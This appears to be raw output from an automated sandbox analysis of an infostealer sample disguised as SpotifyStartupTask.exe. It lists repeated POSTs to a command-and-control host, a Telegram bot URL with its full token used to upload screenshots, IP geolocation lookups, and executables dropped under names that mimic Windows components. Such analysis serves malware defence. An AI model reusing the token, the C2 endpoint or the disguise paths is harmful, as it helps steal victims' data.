                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2052Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2052Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2052Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2052Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2052Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2032Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2052Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2052Expect: 100-continue
                              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
                              Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
                              Source: global trafficDNS traffic detected: DNS query: ipinfo.io
                              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                              Source: global trafficDNS traffic detected: DNS query: 009383cm.nyashk.ru
                              Source: global trafficDNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
                              Source: unknownHTTP traffic detected: POST /bot7756238957:AAHvV3zk_7YEKqo4UEP1y3YWBMYahxxWzGM/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="f6bf5325-8482-421f-8ece-01a42d055ef4"Host: api.telegram.orgContent-Length: 82070Expect: 100-continueConnection: Keep-Alive
                              Source: JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000003107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://009383cm.nyPZ
                              Source: JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002FDB000.00000004.00000800.00020000.00000000.sdmp, JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002D55000.00000004.00000800.00020000.00000000.sdmp, JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://009383cm.nyashk.ru
                              Source: JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002A68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://009383cm.nyashk.ru/
                              Source: JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002A68000.00000004.00000800.00020000.00000000.sdmp, JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002CB6000.00000004.00000800.00020000.00000000.sdmp, JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000003013000.00000004.00000800.00020000.00000000.sdmp, JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000003107000.00000004.00000800.00020000.00000000.sdmp, JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002FDB000.00000004.00000800.00020000.00000000.sdmp, JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002D55000.00000004.00000800.00020000.00000000.sdmp, JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://009383cm.nyashk.ru/geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php
                              Source: SpotifyStartupTask.exe, 00000000.00000002.1264186462.0000000003155000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                              Source: SpotifyStartupTask.exe, 00000000.00000002.1264186462.0000000003429000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ipinfo.io
                              Source: SpotifyStartupTask.exe, 00000000.00000002.1264186462.0000000002D2D000.00000004.00000800.00020000.00000000.sdmp, SpotifyStartupTask.exe, 00000000.00000002.1264186462.0000000003348000.00000004.00000800.00020000.00000000.sdmp, JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002A68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: uELXB8QKnR.29.drString found in binary or memory: https://ac.ecosia.org?q=
                              Source: SpotifyStartupTask.exe, 00000000.00000002.1264186462.0000000003109000.00000004.00000800.00020000.00000000.sdmp, JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                              Source: SpotifyStartupTask.exe, 00000000.00000002.1264186462.0000000003109000.00000004.00000800.00020000.00000000.sdmp, SpotifyStartupTask.exe, 00000000.00000002.1271550475.000000001B382000.00000002.00000001.01000000.00000000.sdmp, JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002C7A000.00000004.00000800.00020000.00000000.sdmp, Rlqiwetw.log.0.dr, LWyBOcEb.log.29.drString found in binary or memory: https://api.telegram.org/bot
                              Source: SpotifyStartupTask.exe, 00000000.00000002.1264186462.0000000003109000.00000004.00000800.00020000.00000000.sdmp, JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002C7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7756238957:AAHvV3zk_7YEKqo4UEP1y3YWBMYahxxWzGM/sendPhotoX
                              Source: uELXB8QKnR.29.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                              Source: FOyAMfVNQd.29.dr, uELXB8QKnR.29.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                              Source: FOyAMfVNQd.29.dr, uELXB8QKnR.29.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                              Source: uELXB8QKnR.29.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                              Source: FOyAMfVNQd.29.dr, uELXB8QKnR.29.drString found in binary or memory: https://duckduckgo.com/chrome_newtabv20-
                              Source: uELXB8QKnR.29.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                              Source: uELXB8QKnR.29.drString found in binary or memory: https://gemini.google.com/app?q=
                              Source: SpotifyStartupTask.exe, 00000000.00000002.1264186462.0000000002D2D000.00000004.00000800.00020000.00000000.sdmp, SpotifyStartupTask.exe, 00000000.00000002.1264186462.000000000340C000.00000004.00000800.00020000.00000000.sdmp, JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io
                              Source: SpotifyStartupTask.exe, 00000000.00000002.1264186462.0000000002D2D000.00000004.00000800.00020000.00000000.sdmp, SpotifyStartupTask.exe, 00000000.00000002.1264186462.000000000340C000.00000004.00000800.00020000.00000000.sdmp, SpotifyStartupTask.exe, 00000000.00000002.1271550475.000000001B382000.00000002.00000001.01000000.00000000.sdmp, JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002BCC000.00000004.00000800.00020000.00000000.sdmp, Rlqiwetw.log.0.dr, LWyBOcEb.log.29.drString found in binary or memory: https://ipinfo.io/country
                              Source: SpotifyStartupTask.exe, 00000000.00000002.1264186462.0000000002D2D000.00000004.00000800.00020000.00000000.sdmp, SpotifyStartupTask.exe, 00000000.00000002.1264186462.000000000340C000.00000004.00000800.00020000.00000000.sdmp, SpotifyStartupTask.exe, 00000000.00000002.1271550475.000000001B382000.00000002.00000001.01000000.00000000.sdmp, JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002BCC000.00000004.00000800.00020000.00000000.sdmp, Rlqiwetw.log.0.dr, LWyBOcEb.log.29.drString found in binary or memory: https://ipinfo.io/ip
                              Source: FOyAMfVNQd.29.dr, uELXB8QKnR.29.drString found in binary or memory: https://www.ecosia.org/newtab/v20
                              Source: FOyAMfVNQd.29.dr, uELXB8QKnR.29.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                              Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.6:49692 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49695 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.6:49706 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49711 version: TLS 1.2
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWindow created: window name: CLIPBRDWNDCLASS
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile created: C:\Windows\DiagTrack\dwm.exeJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile created: C:\Windows\DiagTrack\dwm.exe\:Zone.Identifier:$DATAJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile created: C:\Windows\DiagTrack\6cb0b6c459d5d3Jump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile created: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile created: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe\:Zone.Identifier:$DATAJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile created: C:\Windows\ServiceProfiles\0a9b2f414643b7Jump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile created: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile created: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe\:Zone.Identifier:$DATAJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile created: C:\Windows\AppReadiness\0b4ed68d91a975Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSC2486FE65D2A948F0A69C8E1712F1B267.TMPJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSC2486FE65D2A948F0A69C8E1712F1B267.TMPJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeCode function: 0_2_00007FF88B4E0D480_2_00007FF88B4E0D48
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeCode function: 0_2_00007FF88B4E0E430_2_00007FF88B4E0E43
                              Source: C:\Windows\DiagTrack\dwm.exeCode function: 24_2_00007FF88B50099024_2_00007FF88B500990
                              Source: C:\Windows\DiagTrack\dwm.exeCode function: 24_2_00007FF88B500BB524_2_00007FF88B500BB5
                              Source: C:\Windows\DiagTrack\dwm.exeCode function: 24_2_00007FF88B4E106224_2_00007FF88B4E1062
